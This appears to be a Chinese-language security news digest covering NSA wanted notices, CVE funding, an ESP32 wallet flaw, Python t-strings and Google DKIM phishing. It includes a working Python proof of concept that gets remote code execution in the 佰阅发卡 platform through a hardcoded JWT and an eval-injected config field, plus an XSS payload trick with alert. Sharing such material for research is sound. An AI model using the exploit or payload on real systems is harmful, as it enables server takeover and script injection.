哈尔滨市公安局公开通缉3名美国国家安全局（NSA）特工
为依法严厉打击境外势力对我网络攻击窃密犯罪，切实维护国家网络空间安全和人民生命财产安全，黑龙江省哈尔滨市公安局决定对3名隶属于美国国家安全局（NSA）的犯罪嫌疑人凯瑟琳·威尔逊（Katheryn A. Wilson）、罗伯特·思内尔（Robert J. Snelling）、斯蒂芬·约翰逊（Stephen W. Johnson）进行通缉。
#吃瓜

🚾，📦！

美国政府决定无限期限制英伟达对中国出口专用人工智能(AI)芯片"H20"的出口。 当初感觉到放宽限制的氛围,期待恢复出口,但最近随着中国对美国产品征收报复关税,美国再次转向勒紧限制缰绳的方向。

来源：每日经济 / Wall St Engine

美国CVE漏洞数据库面临资金枯竭危机

美国非营利组织 MITRE 负责维护的全球网络安全关键漏洞数据库——“常见漏洞与披露”（CVE），由政府提供的资金将于本周三到期，或将面临停摆。

CVE漏洞数据库是全球网络安全生态系统的重要基石，为各组织提供漏洞编号、严重程度分级及详细描述。安全专家担忧，一旦CVE漏洞数据库停摆，将严重冲击全球漏洞管理与应变机制，对企业和 CERT（电脑紧急应变小组）等都将产生“快速且严重”的连锁反应。

路透社

📮投稿 ☘️频道 🌸聊天

ESP32芯片的随机数生成器存在问题，导致多个加密货币钱包存在漏洞

所以那些贵上天的加密货币钱包用的都是20块一片的ESP32？

https://news.1rj.ru/str/AppDoDo/1027

佰阅发卡存在RCE漏洞，省流：eval解析json+硬编码JWT secret

POC:

import requests

cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
    url + "/api/v4/update_pays",
    headers={"Authorization": "Bearer " + jwt_token},
    json={
        "data": {
            # "config": f"[exec({payload!r}), f()][-1]",
            "config": f"__import__('os').popen({cmd!r}).read()",
            "icon": "\u652f\u4ed8\u5b9d",
            "id": 2,
            "info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
            "isactive": False,
            "name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
        }
    },
)
resp = requests.get(
    url + "/api/v4/get_pays",
    headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())

https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g

CVE 项目资金危机暂解：网络安全核心服务获 11 个月喘息 - IT之家
https://www.ithome.com/0/845/839.htm

https://www.kandji.io/blog/pasivrobber

TLDR：恁美国OSINT又对着China哈气了，路边拾了个美亚的取证工具一通分析然后怪他主机信息收集太多

Meiya：什么叫我竟然收集信息了，我不收集信息我干嘛

：你们美国OSINT就不能至少要求一下，做中国威胁情报一定要懂汉语
：错了 做中国情报一定要不懂汉语（
不然就不好意思喊了

抖音公开了他们的算法细节

甚至聊到了APP会“窃听”用户谈话吗？
它的副标题是：平台“窃听”在技术上不“划算”，在法律上不被允许。

然而大家都记得，拼多多。。。

雷声大雨点小，毕竟大部分人用的都是openssh

不过影响还是比一般的漏洞要大的

https://news.1rj.ru/str/DNSPODT/9207

Python's new t-strings (Score: 154+ in 5 hours)

Link: https://readhacker.news/s/6t8rs
Comments: https://readhacker.news/c/6t8rs

python3.14新功能t-string, 表示一个模板

python3.13之前：

name = "World"
print("Hello {name}!".format(name)) # "Hello {name}!"是一个字符串

python3.14:

name = "World"
print(t"Hello {name}!") #一个Template对象，需要用其他函数转成字符串

可以用来替代模板渲染引擎，SSTI再也不会导致RCE了（悲）

evil = "<noscript>alert('bad')</noscript>"
template = t"<p>{evil}</p>"
safe = html(template)
assert safe == "<p>&lt;noscript&gt;alert('bad')&lt;/noscript&gt;</p>"

黑客利用Google OAuth漏洞伪造DKIM认证邮件实施钓鱼攻击

黑客通过Google OAuth应用漏洞，伪造了看似来自"no-reply@google.com"的钓鱼邮件，该邮件不仅通过了DKIM（DomainKeys Identified Mail）认证，还被系统归类为真实安全警报。攻击者利用Google Workspace自动发送的安全通知机制，将恶意链接植入由Google官方DKIM密钥签名的邮件中，诱骗用户访问托管在Google自有域名（sites.google.com）上的虚假支持页面以窃取凭证。以太坊域名服务（ENS）首席开发者Nick Johnson识破该骗局后提交漏洞报告，Google最初称此为"正常流程"，后承认风险并着手修复。此前，PayPal平台也出现过同类攻击手法，欺诈者利用"礼品地址"功能批量转发钓鱼邮件。

来源：BleepingComputer

今日XSS小技巧之魅力javanoscript语法

''.replace.call`1${/.../}${alert}`

来源，所以这东西到底是怎么生效的，待我研究一下（

这个东西是JS的标签模板语法，本来是用来标记一个模板的

f`aaa${arg}bbb`就相当于f(["aaa","bbb"], arg)

所以''.replace.call`1${/.../}${alert}`就相当于''.replace.call(["1","",""], /.../, alert) ，也就是把第一个参数转成字符串"1,,"，用正则/.../匹配这个字符串，然后传给alert